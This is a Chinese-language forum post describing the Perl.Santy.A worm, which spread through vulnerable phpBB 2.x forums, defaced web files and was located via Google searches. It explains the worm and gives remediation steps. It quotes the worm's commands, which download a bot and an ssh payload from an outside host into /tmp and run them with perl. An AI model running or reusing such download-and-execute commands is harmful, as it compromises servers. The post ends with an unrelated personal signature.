打印

網頁病毒: Perl.Santy.A

網頁病毒: Perl.Santy.A

Santy.A 是一種蠕蟲,它會對運行有漏洞的 phpBB 2.x 並且是 2.0.11 之前版本的網頁伺服器進行傳播。它只會感染網頁伺服器,一般家用或工作站的電腦則不受影響。

蠕蟲利用 Google 搜尋引擎建立一個簡單的查詢去找出運行 php 的網頁伺服器。當每次找到目標伺服器,便會嘗試攻擊處理特殊參數上的漏洞,繼而安裝蠕蟲複本到這台伺服器。若攻擊成功,蠕蟲會複製自己到這台伺服器和覆寫以下延伸類別的所有檔案: .asp, .htm, .jsp, .php, .phtm, .shtm。 它會將受影響的網站內容更改為以下信息:

This site is defaced!!!
NeverEverNoSanity WebWorm generation X*

(*X 是受感染數目,會隨著新的感染而自動更新。)

以下是從 Google 搜尋出被病毒入侵的網站 (數量真多,大約有 37,000):

http://www.google.com/search?hl= ... +site+is+defaced%22

Google 已實施攔截管制由 Santy.A 製造的查詢請求,預期會大大減弱蠕蟲的傳播能力,降低繼續感染的風險。

病毒會不停執行:

wget civa.org/pdf/bot
wget civa.org/pdf/ssh.a
sh -c echo _START_; cd /tmp;wget civa.org/pdf/bot;perl bot;wget civa.org/pdf/ssh.a;p
httpd -DSSL

佔用伺服器資源:

5023 named     25   0  3044 3044  2180 S    32.3  0.1   1:17   0 named
5836 apache    25   0  3644 3644  1796 R    23.9  0.1   0:30   0 perl
5732 apache    25   0  3644 3644  1796 R    22.7  0.1   2:14   0 perl
5876 apache    25   0  3640 3640  1796 R    20.3  0.1   0:02   0 perl
病毒會不停產生:”m1ho2of ” 這個檔案。

解決方案

更新病毒防護軟件的病毒清單,並用病毒防護軟件去偵測和清除此病毒。

注意:請根據防毒軟件公司的指引來清除病毒和修復系統。

由於這蠕蟲利用 phpBB 的漏洞來感染系統,請升級至 phpBB 2.0.11 版本去避免受攻擊。

請在這裡下載最新的 phpBB 程式,立即更新。
http://sourceforge.net/project/showfiles.php?group_id=7885

在 /tmp 的 directory 中會發現很多病毒的檔案,必須立刻刪除。
搜尋 \’m1ho2of\’ 檔案,立刻刪除。
因為理性敵不過獸性,會被獸性綁起來鞭打,偶然還會滴蠟。(?)

在這帥哥美女賣肉賣臉的社會,大家都已經忘記自己到底喜歡什麼,總是一味的跟著所謂潮流。就像動漫,COSPLAY等,總是會被貼上標籤,總是引來異樣眼光。追求自己所好,何時變成一件可恥的事了?

TOP

Processed in 0.061259 second(s), 7 queries, Gzip enabled.|DEISGNED BY LINSTYLE